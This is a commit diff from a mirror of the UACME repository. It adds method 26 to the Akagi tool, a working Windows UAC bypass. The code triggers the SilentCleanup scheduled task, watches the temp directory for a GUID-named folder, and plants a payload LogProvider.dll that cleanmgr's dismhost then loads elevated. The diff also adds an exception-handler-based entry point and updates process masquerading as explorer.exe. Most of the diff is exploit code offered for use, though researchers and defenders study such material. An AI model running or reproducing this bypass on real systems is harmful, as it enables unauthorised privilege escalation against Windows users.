Rooba
/
UACME
mirror of https://github.com/hfiref0x/UACME.git
1
1
Fork 0
Code Issues Packages Projects Releases Wiki Activity

v 2.5.4 

Enigma0x3 DiskCleanup method integrated as #26
This commit is contained in:
hfiref0x 2017-02-08 00:37:31 +07:00
parent 7e23b232bc
commit 769ade07ba
14 changed files with 339 additions and 45 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
Compiled/Akagi32.exe
View File

Binary file not shown.

BIN
Compiled/Akagi64.exe
View File

Binary file not shown.

10
README.md
View File

@ -37,7 +37,8 @@ Keys (watch debug ouput with dbgview or similar for more info):
* 22 - Hybrid method, abusing SxS DotLocal and targeting consent to gain system privileges, works from Windows 7 up to 10rs2 15025;
* 23 - Hybrid method, abusing Package Manager and DISM, works from Windows 7 up to 10rs2 15025;
* 24 - Original Comet method from BreakingMalware, abuses current user environment variables and CompMgmtLauncher.exe, works from Windows 7 up to 10rs2 15025;
* 25 - Original method from Enigma0x3, abuses shell command execution logic used by autoelevated applications, works from Windows 7 up to 10rs2 15025.
* 25 - Original method from Enigma0x3, abuses shell command execution logic used by autoelevated applications, works from Windows 7 up to 10rs2 15025;
* 26 - Original method from Enigma0x3, abuses race condition with quite idiotic cleanmgr.exe behavior, works on from Windows 10th1 10240 up to 10rs2 15025.
Note:
* Several methods require process injection, so they won't work from wow64, use x64 edition of this tool;
@ -83,7 +84,7 @@ Methods fixed:
* 18 - Windows 10 RS1 starting from public 14371 build;
* 19 - Windows 10 RS1 starting from public 14376 build.
** 20, 21, 22, 23, 24, 25 are not fixed as at 02 February 2017.
** 20, 21, 22, 23, 24, 25, 26 are not fixed as at 08 February 2017.
If you wondering why this still exist and work here is the explanation, an official Microsoft WHITEFLAG (including totally incompetent statements as bonus)
https://blogs.msdn.microsoft.com/oldnewthing/20160816-00/?p=94105
@ -102,8 +103,8 @@ https://blogs.msdn.microsoft.com/oldnewthing/20160816-00/?p=94105
# VirusTotal reference report
* Akagi32 https://www.virustotal.com/en/file/caf744d38820accb48a6e50216e547ed2bb3979604416dbcfcc991ce5e18f4ca/analysis/
* Akagi64 https://www.virustotal.com/en/file/609e9b15114e54ffc40c05a8980cc90f436a4a77c69f3e32fe391c0b130ff1c5/analysis/
* Akagi32 https://www.virustotal.com/en/file/8100847e1066b04615a7ab2c2b919b70d75e96d1900b2f7a03896579f5f1982b/analysis/
* Akagi64 https://www.virustotal.com/en/file/5e453253add4e1b2a0a63c3a2ea2a45631f99e45d2e1dce96159766a30c73333/analysis/
# Build
@ -119,6 +120,7 @@ https://blogs.msdn.microsoft.com/oldnewthing/20160816-00/?p=94105
* KernelMode.Info UACMe thread, http://www.kernelmode.info/forum/viewtopic.php?f=11&t=3643
* Command Injection/Elevation - Environment Variables Revisited, https://breakingmalware.com/vulnerabilities/command-injection-and-elevation-environment-variables-revisited
* "Fileless" UAC Bypass Using eventvwr.exe and Registry Hijacking, https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
* Bypassing UAC on Windows 10 using Disk Cleanup, https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/
# Authors

BIN
Source/Akagi/Resource.rc
View File

Binary file not shown.

10
Source/Akagi/consts.h
View File

@ -4,9 +4,9 @@
*
* TITLE: CONSTS.H
*
* VERSION: 2.53
* VERSION: 2.54
*
* DATE: 18 Jan 2017
* DATE: 07 Feb 2017
*
* Global consts definition file.
*
@ -27,6 +27,8 @@
#define CMD_EXTRACT_WINSAT L"/c wusa %ws /extract:%%windir%%\\system32\\sysprep"
#define CMD_EXTRACT_MIGWIZ L"/c wusa %ws /extract:%%windir%%\\system32\\migwiz"
#define T_SCHTASKS_CMD L"/run /tn \"\\Microsoft\\Windows\\DiskCleanup\\SilentCleanup\" /i"
#define T_CLSID_ShellSecurityEditor L"{4D111E08-CBF7-4f12-A926-2C7920AF52FC}"
#define T_IID_ISecurityEditor L"{14B2C619-D07A-46EF-8B62-31B64F3B845C}"
#define ISECURITYEDITOR_ELEMONIKER L"Elevation:Administrator!new:{4D111E08-CBF7-4f12-A926-2C7920AF52FC}"
@ -59,6 +61,8 @@
#define DEVOBJ_DLL L"devobj.dll"
#define UNBCL_DLL L"unbcl.dll"
#define DISMCORE_DLL L"dismcore.dll"
#define LOGPROVIDER_DLL L"LogProvider.dll"
#define PROVPROVIDER_DLL L"ProvProvider.dll"
#define CLICONFG_EXE L"cliconfg.exe"
#define OOBE_EXE L"oobe.exe"
#define WINSAT_EXE L"winsat.exe"
@ -74,6 +78,7 @@
#define SPINSTALL_EXE L"spinstall.exe"
#define CONSENT_EXE L"consent.exe"
#define EVENTVWR_EXE L"eventvwr.exe"
#define SCHTASKS_EXE L"schtasks.exe"
#define COMPMGMTLAUNCHER_EXE L"CompMgmtLauncher.exe"
#define PKGMGR_EXE L"pkgmgr.exe"
#define SYSPREP_DIR L"sysprep\\"
@ -100,6 +105,7 @@
#define LAZYWOW64UNSUPPORTED L"Use 32 bit version of this tool on 32 bit OS version"
#define OSTOOOLD L"This method require Windows 7 and above"
#define WINBLUEWANTED L"This method require Windows 8 and above"
#define WIN10ONLY L"This method require Windows 10 and above"
#define UACFIX L"This method fixed/unavailable in the current version of Windows, do you still want to continue?"
#define T_AKAGI_KEY L"Software\\Akagi"
#define T_AKAGI_PARAM L"LoveLetter"

178
Source/Akagi/enigma0x3.c
View File

@ -4,15 +4,16 @@
*
* TITLE: ENIGMA0X3.C
*
* VERSION: 2.53
* VERSION: 2.54
*
* DATE: 18 Jan 2017
* DATE: 07 Feb 2017
*
* Enigma0x3 autoelevation method.
* Used by unnamed MSIL malware.
* Enigma0x3 autoelevation methods.
* Used by various malware.
*
* For description please visit original URL
* https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
* https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -101,3 +102,172 @@ BOOL ucmHijackShellCommandMethod(
return bResult;
}
/*
* ucmDiskCleanupWorkerThread
*
* Purpose:
*
* Worker thread.
*
*/
DWORD ucmDiskCleanupWorkerThread(
LPVOID Parameter
)
{
BOOL bCond = FALSE;
NTSTATUS status;
HANDLE hDirectory = NULL, hEvent = NULL;
SIZE_T sz;
PVOID Buffer = NULL;
LPWSTR fp = NULL;
UACMECONTEXT *Context = (UACMECONTEXT *)Parameter;
FILE_NOTIFY_INFORMATION *pInfo = NULL;
UNICODE_STRING usName;
IO_STATUS_BLOCK IoStatusBlock;
OBJECT_ATTRIBUTES ObjectAttributes;
WCHAR szFileName[MAX_PATH * 2], szTempBuffer[MAX_PATH];
do {
RtlSecureZeroMemory(&usName, sizeof(usName));
if (!RtlDosPathNameToNtPathName_U(Context->szTempDirectory, &usName, NULL, NULL))
break;
InitializeObjectAttributes(&ObjectAttributes, &usName, OBJ_CASE_INSENSITIVE, 0, NULL);
status = NtCreateFile(&hDirectory, FILE_LIST_DIRECTORY | SYNCHRONIZE,
&ObjectAttributes,
&IoStatusBlock,
NULL,
FILE_OPEN_FOR_BACKUP_INTENT,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
FILE_OPEN,
FILE_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT,
NULL,
0
);
if (!NT_SUCCESS(status))
break;
sz = 1024 * 1024;
Buffer = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, sz);
if (Buffer == NULL)
break;
InitializeObjectAttributes(&ObjectAttributes, NULL, 0, 0, NULL);
status = NtCreateEvent(&hEvent, EVENT_ALL_ACCESS, &ObjectAttributes, NotificationEvent, FALSE);
if (!NT_SUCCESS(status))
break;
do {
status = NtNotifyChangeDirectoryFile(hDirectory, hEvent, NULL, NULL,
&IoStatusBlock, Buffer, (ULONG)sz, FILE_NOTIFY_CHANGE_DIR_NAME | FILE_NOTIFY_CHANGE_FILE_NAME, TRUE);
if (status == STATUS_PENDING)
NtWaitForSingleObject(hEvent, TRUE, NULL);
pInfo = (FILE_NOTIFY_INFORMATION*)Buffer;
for (;;) {
if (pInfo->Action == FILE_ACTION_ADDED) {
RtlSecureZeroMemory(szTempBuffer, sizeof(szTempBuffer));
_strncpy(szTempBuffer, MAX_PATH, pInfo->FileName, pInfo->FileNameLength / sizeof(WCHAR));
if ((szTempBuffer[8] == L'-') && //
(szTempBuffer[13] == L'-') && // If GUID form directory name.
(szTempBuffer[18] == L'-') && //
(szTempBuffer[23] == L'-'))
{
//If it is file after LogProvider.dll
fp = _filename(szTempBuffer);
if (_strcmpi(fp, PROVPROVIDER_DLL) == 0) {
RtlSecureZeroMemory(szFileName, sizeof(szFileName));
_strcpy(szFileName, Context->szTempDirectory);
fp = _filepath(szTempBuffer, szTempBuffer);
if (fp) {
_strcat(szFileName, fp); //slash on the end
_strcat(szFileName, LOGPROVIDER_DLL);
supWriteBufferToFile(szFileName, Context->PayloadDll, Context->PayloadDllSize);
}
status = STATUS_NO_SECRETS;
} //_strcmpi
} //guid test
} //Action
if (status == STATUS_NO_SECRETS)
break;
pInfo = (FILE_NOTIFY_INFORMATION*)(((LPBYTE)pInfo) + pInfo->NextEntryOffset);
if (pInfo->NextEntryOffset == 0)
break;
NtSetEvent(hEvent, NULL);
}
} while (NT_SUCCESS(status));
} while (bCond);
if (usName.Buffer) {
RtlFreeUnicodeString(&usName);
}
if (hDirectory != NULL)
NtClose(hDirectory);
if (hEvent)
NtClose(hEvent);
if (Buffer != NULL)
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Buffer);
return 0;
}
/*
* ucmDiskCleanupRaceCondition
*
* Purpose:
*
* Use cleanmgr innovation implemented in Windows 10+.
* Cleanmgr.exe uses full copy of dismhost.exe from local %temp% directory.
* RC friendly.
*
*/
BOOL ucmDiskCleanupRaceCondition(
VOID
)
{
BOOL bResult = FALSE;
DWORD ti;
HANDLE hThread = NULL;
SHELLEXECUTEINFOW shinfo;
hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ucmDiskCleanupWorkerThread, &g_ctx, 0, &ti);
if (hThread) {
RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
shinfo.cbSize = sizeof(shinfo);
shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
shinfo.lpFile = SCHTASKS_EXE;
shinfo.lpParameters = T_SCHTASKS_CMD;
shinfo.nShow = SW_SHOW;
if (ShellExecuteExW(&shinfo)) {
if (shinfo.hProcess)
WaitForSingleObject(shinfo.hProcess, INFINITE);
CloseHandle(shinfo.hProcess);
}
//
// Because cleanmgr.exe is slow we need to wait enough time until it will try to launch dismhost.exe
// It may happen very fast or really slow depending on resources usage.
// Well lets hope 10 min is enough.
//
if (WaitForSingleObject(hThread, 60000 * 10) == WAIT_OBJECT_0)
bResult = TRUE;
CloseHandle(hThread);
}
return bResult;
}

8
Source/Akagi/enigma0x3.h
View File

@ -4,9 +4,9 @@
*
* TITLE: ENIGMA0X3.H
*
* VERSION: 2.53
* VERSION: 2.54
*
* DATE: 18 Jan 2017
* DATE: 07 Feb 2017
*
* Prototypes and definitions for Enigma0x3 autoelevation method.
*
@ -22,3 +22,7 @@ BOOL ucmHijackShellCommandMethod(
_In_opt_ LPWSTR lpszPayload,
_In_ LPWSTR lpszTargetApp
);
BOOL ucmDiskCleanupRaceCondition(
VOID
);

10
Source/Akagi/global.h
View File

@ -6,7 +6,7 @@
*
* VERSION: 2.53
*
* DATE: 18 Jan 2017
* DATE: 20 Jan 2017
*
* Common header file for the program support routines.
*
@ -79,6 +79,7 @@ typedef enum _UACBYPASSMETHOD {
UacMethodDISM,
UacMethodComet,
UacMethodEnigma0x3,
UacMethodEnigma0x3_2,
UacMethodMax
} UACBYPASSMETHOD;
@ -123,4 +124,11 @@ typedef struct _UACME_CONTEXT {
WCHAR szTempDirectory[MAX_PATH + 1]; //with end slash
} UACMECONTEXT, *PUACMECONTEXT;
typedef UINT(WINAPI *pfnEntryPoint)();
typedef struct _UACME_THREAD_CONTEXT {
TEB_ACTIVE_FRAME Frame;
pfnEntryPoint ucmMain;
} UACME_THREAD_CONTEXT, *PUACME_THREAD_CONTEXT;
extern UACMECONTEXT g_ctx;

88
Source/Akagi/main.c
View File

@ -4,9 +4,9 @@
*
* TITLE: MAIN.C
*
* VERSION: 2.53
* VERSION: 2.54
*
* DATE: 18 Jan 2017
* DATE: 07 Feb 2017
*
* Program entry point.
*
@ -23,6 +23,7 @@
#pragma comment(lib, "comctl32.lib")
UACMECONTEXT g_ctx;
TEB_ACTIVE_FRAME_CONTEXT g_fctx = { 0, "=^_^=" };
static pfnDecompressPayload pDecryptPayload = NULL;
@ -146,7 +147,6 @@ UINT ucmInit(
TempWindow = CreateWindowEx(WS_EX_TOPMOST, WndClassName, WndTitleName,
WS_VISIBLE | WS_POPUP | WS_CLIPCHILDREN | WS_CLIPSIBLINGS, 0, 0, 30, 30, NULL, NULL, inst, NULL);
//remember dll handles
g_ctx.hKernel32 = GetModuleHandleW(KERNEL32_DLL);
if (g_ctx.hKernel32 == NULL) {
@ -524,6 +524,16 @@ UINT ucmMain()
case UacMethodEnigma0x3:
break;
case UacMethodEnigma0x3_2:
#ifndef _DEBUG
if (g_ctx.dwBuildNumber < 10240) {
ucmShowMessage(WIN10ONLY);
return ERROR_UNSUPPORTED_TYPE;
}
#endif
break;
}
//prepare command for payload
@ -531,7 +541,10 @@ UINT ucmMain()
RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
GetCommandLineParam(GetCommandLine(), 2, szBuffer, MAX_PATH, &paramLen);
if (paramLen > 0) {
if ((g_ctx.Method != UacMethodRedirectExe) && (g_ctx.Method != UacMethodComet)) {
if ((g_ctx.Method != UacMethodRedirectExe) &&
(g_ctx.Method != UacMethodComet) &&
(g_ctx.Method != UacMethodEnigma0x3))
{
supSetParameter((LPWSTR)&szBuffer, paramLen * sizeof(WCHAR));
}
}
@ -579,7 +592,7 @@ UINT ucmMain()
}
#endif
if (MessageBox(GetDesktopWindow(),
TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."),
TEXT("This method will permanently TURN UAC OFF, are you sure?"),
PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES)
{
if (ucmSimdaTurnOffUac()) {
@ -778,14 +791,75 @@ UINT ucmMain()
return ERROR_SUCCESS;
}
break;
case UacMethodEnigma0x3_2:
if (ucmDiskCleanupRaceCondition()) {
return ERROR_SUCCESS;
}
break;
}
return ERROR_ACCESS_DENIED;
}
DWORD g_ExCookie = 0;
LONG NTAPI ucmVehHandler(
EXCEPTION_POINTERS *ExceptionInfo
)
{
UACME_THREAD_CONTEXT *uctx;
if (ExceptionInfo->ExceptionRecord->ExceptionCode == STATUS_SINGLE_STEP)
if (ExceptionInfo->ExceptionRecord->ExceptionFlags == g_ExCookie) {
uctx = (UACME_THREAD_CONTEXT*)RtlGetFrame();
while ((uctx != NULL) && (uctx->Frame.Context != &g_fctx)) {
uctx = (UACME_THREAD_CONTEXT *)uctx->Frame.Previous;
}
if (uctx) {
if (uctx->ucmMain)
uctx->ucmMain();
}
ExceptionInfo->ContextRecord->EFlags |= 0x10000;
return EXCEPTION_CONTINUE_EXECUTION;
}
return EXCEPTION_CONTINUE_SEARCH;
}
/*
* main
*
* Purpose:
*
* Program entry point.
*
*/
VOID main()
{
ExitProcess(ucmMain());
PVOID ExceptionHandler;
DWORD k;
EXCEPTION_RECORD ex;
UACME_THREAD_CONTEXT uctx;
RtlSecureZeroMemory(&uctx, sizeof(uctx));
ExceptionHandler = RtlAddVectoredExceptionHandler(1, &ucmVehHandler);
if (ExceptionHandler) {
uctx.Frame.Context = &g_fctx;
uctx.ucmMain = (pfnEntryPoint)ucmMain;
RtlPushFrame((PTEB_ACTIVE_FRAME)&uctx);
k = ~GetTickCount();
g_ExCookie = RtlRandomEx(&k);
RtlSecureZeroMemory(&ex, sizeof(ex));
ex.ExceptionFlags = g_ExCookie;
ex.ExceptionCode = (DWORD)STATUS_SINGLE_STEP;
RtlRaiseException(&ex);
RtlRemoveVectoredExceptionHandler(ExceptionHandler);
RtlPopFrame((PTEB_ACTIVE_FRAME)&uctx);
}
ExitProcess(0);
}

21
Source/Akagi/sup.c
View File

@ -6,7 +6,7 @@
*
* VERSION: 2.53
*
* DATE: 18 Jan 2017
* DATE: 19 Jan 2017
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -506,10 +506,9 @@ VOID supMasqueradeProcess(
VOID
)
{
SIZE_T sz = 0x1000;
PPEB Peb = g_ctx.Peb;
SIZE_T sz;
DWORD cch;
WCHAR szBuffer[MAX_PATH + 1];
WCHAR szBuffer[MAX_PATH * 2];
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
cch = GetWindowsDirectory(szBuffer, MAX_PATH);
@ -518,18 +517,19 @@ VOID supMasqueradeProcess(
_strcat(szBuffer, L"\\explorer.exe");
g_lpszExplorer = NULL;
sz = 0x1000;
NtAllocateVirtualMemory(NtCurrentProcess(), &g_lpszExplorer, 0, &sz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (g_lpszExplorer) {
_strcpy(g_lpszExplorer, szBuffer);
RtlEnterCriticalSection(Peb->FastPebLock);
RtlEnterCriticalSection(g_ctx.Peb->FastPebLock);
RtlInitUnicodeString(&Peb->ProcessParameters->ImagePathName, g_lpszExplorer);
RtlInitUnicodeString(&Peb->ProcessParameters->CommandLine, APPCMDLINE);
RtlInitUnicodeString(&g_ctx.Peb->ProcessParameters->ImagePathName, g_lpszExplorer);
RtlInitUnicodeString(&g_ctx.Peb->ProcessParameters->CommandLine, APPCMDLINE);
RtlLeaveCriticalSection(Peb->FastPebLock);
RtlLeaveCriticalSection(g_ctx.Peb->FastPebLock);
LdrEnumerateLoadedModules(0, &supxLdrEnumModulesCallback, (PVOID)Peb);
LdrEnumerateLoadedModules(0, &supxLdrEnumModulesCallback, (PVOID)g_ctx.Peb);
}
}
}
@ -706,6 +706,9 @@ VOID NTAPI sxsFindDllCallback(
do {
if ((sctx == NULL) || (DataTableEntry == NULL))
break;
if ((DataTableEntry->BaseDllName.Buffer == NULL) ||
(DataTableEntry->FullDllName.Buffer == NULL))
break;

6
Source/Akagi/uacme.vcxproj
View File

@ -186,6 +186,9 @@
<Manifest>
<AdditionalManifestFiles>akagi.manifest</AdditionalManifestFiles>
</Manifest>
<PostBuildEvent>
<Command>\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Akagi32.exe</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
@ -223,6 +226,9 @@
<Manifest>
<AdditionalManifestFiles>akagi.manifest</AdditionalManifestFiles>
</Manifest>
<PostBuildEvent>
<Command>\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Akagi64.exe</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="..\Shared\cmdline.c" />

4
Source/Akagi/uacme.vcxproj.user
View File

@ -9,11 +9,11 @@
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LocalDebuggerCommandArguments>24</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments>26</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LocalDebuggerCommandArguments>25</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments>26</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
</Project>

25
Source/Shared/ntos.h
View File

@ -4,9 +4,9 @@
*
* TITLE: NTOS.H
*
* VERSION: 1.51
* VERSION: 1.53
*
* DATE: 18 Jan 2017
* DATE: 06 Feb 2017
*
* Common header file for the ntos API functions and definitions.
*
@ -4559,6 +4559,10 @@ ULONG NTAPI RtlRemoveVectoredExceptionHandler(
_In_ PVOID Handle
);
VOID NTAPI RtlRaiseException(
_In_ PEXCEPTION_RECORD
);
VOID NTAPI RtlPushFrame(
_In_ PTEB_ACTIVE_FRAME Frame
);
@ -5380,6 +5384,18 @@ NTSTATUS NTAPI NtQueryDirectoryFile(
_In_ BOOLEAN RestartScan
);
NTSTATUS NTAPI NtNotifyChangeDirectoryFile(
_In_ HANDLE FileHandle,
_In_opt_ HANDLE Event,
_In_opt_ PIO_APC_ROUTINE ApcRoutine,
_In_opt_ PVOID ApcContext,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
__out_bcount(Length) PVOID Buffer,
_In_ ULONG Length,
_In_ ULONG CompletionFilter,
_In_ BOOLEAN WatchTree
);
NTSTATUS NTAPI NtQuerySection(
_In_ HANDLE SectionHandle,
_In_ SECTION_INFORMATION_CLASS SectionInformationClass,
@ -5888,6 +5904,11 @@ NTSTATUS NTAPI NtCreateEvent(
_In_ BOOLEAN InitialState
);
NTSTATUS NTAPI NtSetEvent(
_In_ HANDLE EventHandle,
_Out_opt_ PLONG PreviousState
);
NTSTATUS NTAPI NtAllocateVirtualMemory(
_In_ HANDLE ProcessHandle,
_Inout_ PVOID *BaseAddress,

24
UACME.sha256
View File

@ -1,5 +1,5 @@
caf744d38820accb48a6e50216e547ed2bb3979604416dbcfcc991ce5e18f4ca *Compiled\Akagi32.exe
609e9b15114e54ffc40c05a8980cc90f436a4a77c69f3e32fe391c0b130ff1c5 *Compiled\Akagi64.exe
8100847e1066b04615a7ab2c2b919b70d75e96d1900b2f7a03896579f5f1982b *Compiled\Akagi32.exe
5e453253add4e1b2a0a63c3a2ea2a45631f99e45d2e1dce96159766a30c73333 *Compiled\Akagi64.exe
098e6b9ca3c24b8d3dc8c2eb1a8ed8a07ca7248de1395e0ab4b515ff55a6eae4 *Source\uacme.sln
8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf *Source\Akagi\akagi.ico
02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02 *Source\Akagi\akagi.manifest
@ -14,30 +14,30 @@ e087dfb09004d72749ffa94e016860683a7c20f147346e1acf0f561da400e9f1 *Source\Akagi\b
ba15ec03e68f87b0e1b86ff826b1b42886aac497d0bc7aca8753e5d3ffdb1693 *Source\Akagi\comet.h
fce0f9f17b98675ea322c9f1729c73c56467fbb68335e86417517e6fd549f630 *Source\Akagi\compress.c
be3ecc4805c0c88ef53364c54448b13d19ddd1a31562602dbdca2457237a9e81 *Source\Akagi\compress.h
6b91a330d0364f46649103359ac5b5151bfce528e071bf359f2d70fb1fed7120 *Source\Akagi\consts.h
12ab1a9c817e811b9bc717bd0d97a7c4ccd1fcf1aff3286f8678b469c1f705f5 *Source\Akagi\enigma0x3.c
68ca3022e53c0cd73faf2e6f890ff3442c6026145d6443d435ff515baa89a894 *Source\Akagi\enigma0x3.h
149439592460c97be0ec568a9fee2108389e7ef274897574e2833ffb2fae0213 *Source\Akagi\global.h
6371bbc89d908cef5ee47fc436227cfa8f7d2dd026436832fb23fcde6eb18a17 *Source\Akagi\consts.h
bb21e48947918f6c73659f2987fbb59740e341beee1266973bb12786eefa6b16 *Source\Akagi\enigma0x3.c
362c2c8c0aeb6ed6396fffb1d06f5b83ac03b74c75845da0cab4702311863520 *Source\Akagi\enigma0x3.h
069d647a1453a78d20c8ae7f0d0b45554a0df26bdb4b4df3ba6ec964cc0b5df3 *Source\Akagi\global.h
5d17ed805de8f280c2430e3deb20acd4fa1dc8e43560773186707974cbf3a9eb *Source\Akagi\gootkit.c
c37113f14c181533280441de1199cc511c7b35a42ceea3b9c0e671da7140d6fa *Source\Akagi\gootkit.h
8761ed178e2a91e89bc1421a903f82f10364bbb598fa519178a4f324b6b97f65 *Source\Akagi\hybrids.c
81f2108849fb85fbd2e8ee6b2ea35fe383446bdd218d3ed628c75f17352afabd *Source\Akagi\hybrids.h
ee302f5456d5d997bf85636f1d116e0492782e826f768cc64285e74e3304e50e *Source\Akagi\main.c
4999f2124a97ddd4bd4535a4bf8367b38c381c8452b7bb51a7465eb7ce676697 *Source\Akagi\main.c
dab08cd614d03456a3310ca1e6d7718028d45fedd88c2b516f67d2655238e0d0 *Source\Akagi\makecab.c
67a5f4f8d7aee49d7c1e029ddf50520d56f6081917a2cc2904764336857382a0 *Source\Akagi\makecab.h
d2e73e697dc427dadf0902fa3b18a71dbb1e482ab57daf9c1bb4051bff717fba *Source\Akagi\manifest.h
3cbe32882a569f18c57ee3cbeaf05c9cecfcf4674fd3292a990cd46e63b87045 *Source\Akagi\pitou.c
7f8aec0ef71310198ba697c1acc8bdeff64279b039b82c6761f110bbd92e6dfb *Source\Akagi\pitou.h
c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h
bfec6d928158f2f4d8de2f9b509dd6e46a0b6993db64ceb2734ed848e8f48314 *Source\Akagi\Resource.rc
eaadd82fbc9ceb272e5afbeb5843371aaf4fdb2af961262b6ff88db4aa117192 *Source\Akagi\Resource.rc
d84490cd98b484bb0e8af241df7500efef502525ec7249aa6a5b6f850e2bac77 *Source\Akagi\simda.c
9d25bcd377d6bc86332ac613cd99362c9881302d403a3e4e1e8c93a266982b32 *Source\Akagi\simda.h
41af5a0b6ae9d510689410c183cb30537ec30084a32620d5734675ff780bdf5c *Source\Akagi\sirefef.h
a1b963ca686e4b595ae23ca18296e5f2b8190f5a7feece7faba8c0be4fe26acc *Source\Akagi\sup.c
796b444a8afdf16455d6c8de01d55737ba5113ac6a935f1f829dccfed445dbee *Source\Akagi\sup.c
247b69ae74d383d57c33a9db45ed18f436e0db9e918e0c8216267a1b91488cec *Source\Akagi\sup.h
f822ad0e3793d6da0823af18df42d36855f957303a86b9600b9f3051f03a6156 *Source\Akagi\uacme.vcxproj
03b45c6826f71e3320ed58561291407730b1abe54ca4bfa1534496d2522da3ab *Source\Akagi\uacme.vcxproj
00e5a7fa7a42ee0a196f9f8391dd32afae69cc6d6aa9d573ef3a2c32b82ba495 *Source\Akagi\uacme.vcxproj.filters
fc119d09e357972a5b3f5914510d126b8563efb741bea05c21104d9b15c3006b *Source\Akagi\uacme.vcxproj.user
52738d01f69a34e4c143d38d3fdf7bb5cd9fddb288f29da0bbcd705e49cd4a44 *Source\Akagi\uacme.vcxproj.user
087f64ac18b054724e683d0ef92a885e19a8e1fe43405d71144ac9692b58e21a *Source\Akagi\bin\Fubuki32.cd
dd5c530a8c5a7d80ed541cafa566ed2af664bac6ea558fbe0773378ecc837e85 *Source\Akagi\bin\Fubuki64.cd
0617a97e15c312915fedfc5f2eebfc2d417cfbd667896bcf9d33846334ae98a4 *Source\Akagi\bin\Hibiki32.cd
@ -80,7 +80,7 @@ abd562aa6b8721caf958b4f87b67787a82ab81b64df21c46df01f67891c37ce7 *Source\Naka\Na
893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Shared\cmdline.c
bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Shared\cmdline.h
107245437ed86b6f1e839b2d3d9bbadb3d9980046cb5c7001f985fed3627962f *Source\Shared\minirtl.h
4d545749c75f9d3aa7502b7056956912488feede3f5879178a91a9c32a2df0ab *Source\Shared\ntos.h
dd9325113e26f117347a388ecbe50497bb0fd8111ced6510fa854dd36fe58f23 *Source\Shared\ntos.h
b9de99d3447bb1a125cb92aa1b3f9b56a59522436f1a1a97f23aac9cee90341c *Source\Shared\rtltypes.h
c0dd0e6d2f4b23a97b6cabb9822b87adb6ae8723ee3e65831809e549b7efcb9a *Source\Shared\strtoul.c
9cbedf9b92abaef3ea28de28dd523ac44079592178ef727c7003c339a5a54712 *Source\Shared\ultostr.c